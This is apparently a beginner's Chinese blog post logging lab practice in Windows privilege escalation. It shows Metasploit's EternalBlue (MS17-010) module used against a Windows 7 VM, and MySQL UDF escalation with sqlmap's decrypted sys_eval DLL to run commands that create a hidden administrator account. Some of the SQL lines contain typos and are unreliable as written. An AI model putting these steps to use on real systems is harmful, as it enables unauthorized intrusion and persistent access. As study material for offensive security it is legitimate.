windows系統遠程提權、MySQL UDF提權


前言
小白一枚,之前聽過的比較厲害的操作就是提權,維權。今天學習一下。

權限提升

提權本質

提權本質就是提升自己在服務器中的權限,獲得更大的權限。
例如:在Windows系統下普通用戶,通過提權獲得Administrator一樣的權限;在linux中通過執行編譯後的程序,從普通用戶權限提升到root賬號權限。

提權分類

第一種分類:

  • 本地提權
    當前登錄到系統是一個普通用戶,通過在本地執行的操作和程序來獲得更高的權限
  • 遠程提權
    遠程提權是指在遠程的機器上對目標服務器進行對應操作和執行程序對目標系統發送數據包,針對目標系統所存在的漏洞來獲得最高的權限Administrator或者root。
    第二種分類
  • 系統提權
    針對系統的弱點或者漏洞來提升應的權限
  • 第三方軟件提權
    利用系統上安裝的一些軟件(下載的),通過這些軟件來提升權限。

windows系統提權基礎命令

  • 獲取IP地址信息
    IP地址是計算機在網絡中的門牌號,用來尋找計算機的地址。同一臺計算機有多個IP地址,可以有外部連接的IP地址,內部IP地址。

在提權過程中,如果有外網IP地址,可以直接使用3389端口進行遠程桌面連接。
在windows系統下使用 ipconfig /all查看網卡信息。
ipconfig獲取的信息其實是不全面的,加個/all可以查看全部網卡信息。一般192.168開頭的是私網地址。

  • 獲取端口信息
    端口是計算機與外部連接的一個接口,每個開放的服務對應一個端口。
    windows系統下可以使用netstat命令獲取端口開放狀態。
    netstat -an獲取當前主機所有端口的開放情況及網絡連接情況。
  • 獲取服務信息和進程信息
    在windows系統下可以使用tasklist /svc命令獲取運行的進程名稱、服務、和PID。
  • 添加鏈接描述進程結束、用戶管理命令
    1.使用taskkill來結束進程。taskkill /?獲取幫助信息。
    2.在windows系統下,系統訪問需要有對應的用戶和密碼。
    可以通過以下命令添加用戶
net user username password /add
net localgroup administrator username /add

windows提權輔助工具

輔助工具介紹

Windows-Exploit-Suggester此工具將目標補丁與Microsoft漏洞數據庫進行比較,以檢測目標上潛在的缺失補丁。
github項目地址——🔑傳送門
安裝環境:python2.7、安裝xlrd模塊

#只有一個python2的環境
python -m pip install xlrd
#同時集合python2和python3
python2 -m pip install xlrd

m0re
安裝成功。
然後執行--update以獲取漏洞文件
m0re
在文件目錄下獲得一個這樣的文件。
然後獲取一個本機文件

systeminfo

然後使用命令將這些內容寫入一個文件中,

systeminfo > win7.txt

生成一個win7文件,將它粘貼到輔助工具目錄下。
使用命令進行測試

python windows-exploit-suggester.py --audit -i win7.txt -d 2020-07-01-mssb.xls

然後對比出來一些重要漏洞
m0re
如:MS13-055就是13年的第55個漏洞。

windows遠程提權

在授權的情況下,針對目標機器進行提權。可以首先掃描系統是否存在可利用漏洞,探測是否可以利用。

如果可以直接獲得最高權限,那麼就不需要本地提權,直接遠程提權拿到最高權限。
介紹一個漏洞ms17-010
ms17-010是一個安全類型的補丁,MS17-010更新修復了Microsoft Windows中的漏洞。

WannaCry(又叫Wanna Decryptor),一種“蠕蟲式”的勒索病毒軟件,大小3.3MB,由不法分子利用NSA(National Security Agency,美國國家安全局)泄露的危險漏洞“EternalBlue”(永恆之藍)進行傳播。勒索病毒肆虐,儼然是一場全球性互聯網災難,給廣大電腦用戶造成了巨大損失。最新統計數據顯示,100多個國家和地區超過10萬臺電腦遭到了勒索病毒攻擊、感染。勒索病毒是自熊貓燒香以來影響力最大的病毒之一。

掃描探測ms17-010漏洞
在metasploit下直接利用ms17-010的漏洞掃描模塊進行探測。
利用metasploit下的windows/smb/ms17_010_eternalblue模塊進行遠程提權
設置完參數就可以進行攻擊:

exploit				#開始執行
shell				#使用shell命令/功能
whoami				#查詢當前登錄的用戶會發現是windows最高權限system

這個真的厲害,學到了。

上手操作一下

首先需要開啓一臺win7虛擬機,然後看一下win7的IP地址。
打開kali終端輸入msfconsole啓用metasploit
使用搜查ms17-010模塊,use auxiliary/scanner/smb/smb_ms17_010
設置rhost參數:set rhosts 192.168.xx.xx
然後run
就可以查詢當前IP是否存在漏洞了。search ms17-010
m0re
可以看出,這個漏洞是2017年3月14日的。
既然存在漏洞了,那就利用這個漏洞來進行提權操作。
metasploit下也集成了ms17-010的漏洞利用模塊。use exploit/windows/smb/ms17_010_eternalblue
當然還有其他的模塊。下面這個就是win8系統的。現在我的是win7,所以就用上面的這個就行。
m0re
然後設置一下rhosts就行了。好像是升級了,居然這麼簡單。設置好參數後直接使用exploit直接進行提權,等待一會。
過程很快的還是。直接輸入whoami
會發現,已經是最高權限登錄到win7了
m0re
成功了。

Mysql UDF提權

udf介紹

UDF是mysql的一個拓展接口,UDF(Userdefined function)可翻譯爲用戶自定義函數,這個是用來拓展Mysql的技術手段。

在提權過程中,經常使用mysql的udf.dl進行提權。並且提權之前,要上傳udf.dll到指定的目錄下。使用select@@plugin_dir;或show
variables like’plugin%’,查看具體目錄。

m0re
修改目錄方式:

1、mysqld.exe--plugin-dir=具體目錄
2、mysqld.exe--defaults-file=具體目錄
3、mysql.ini配置文件plugindir=具體目錄

udf.dll獲取

sqlmap下自帶了對應提權使用的udf庫。可以直接下載使用,但是sqlmap進行加密,需要解密使用。
sqlmap在kali中自帶,可以使用下面這個方法。
sqlmap在/root/usr/share/sqlmap
關於UDF則是在
m0re
因爲我的mysql是win32,所以選擇32
奧,至於查看的話,在mysql命令行中使用

select @@version_compile_os;

m0re
不過這個udf是加密的,不過sqlmap中有解密的腳本,可以直接使用,腳本在extra中的cloak中,
m0re
然後就可以使用了,命令爲

./cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_

不過我的使用時出問題了,忙着解決,也忘了截圖了。我放棄了在linux中解密的方法,我在win7中也有sqlmap,所以我就在win7中解密了,可以成功。
m0re
然後在cloak目錄下生成了dll文件。
m0re

上傳udf

將udf.dll文件上傳到具體目錄下。
具體目錄上面已經說過查詢方法。

上傳方式:
利用SQL注入進行上傳select load_file() into dumpfile " 具體路徑"
使用菜刀直接上傳
emmm我直接將文件放在對應目錄下了,不演示上傳
m0re

執行提權命令

create function sys_eval returns string soname 'udf.dll;
select* from mysqlaiunc where name='sys_eval';
select sys _eval('dir);
select sys _eval('net user user1 123 /add');
select sys _eval('net localgroup administrators user1 /add"); 
drop function sys_eval;

如果出現這樣的界面就是對了。
m0re
然後進行下面的步驟就行。
m0re
然後會執行dir命令,顯示當前目錄下的文件。
如果電腦中安裝有360安全(LM)衛士,會有提示的
m0re
emmm ,這基本就是MySQL的UDF提權的操作了。學到了好多。

此次學習到此結束。

文末寄語:

所有的悲傷,總會留下一絲歡樂的線索。所有的遺憾,總會留下一處完美的角落。我在冰封的深海,找尋希望的缺口。卻在午夜驚醒時,驀然瞥見絕美的月光。——《缺口》

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章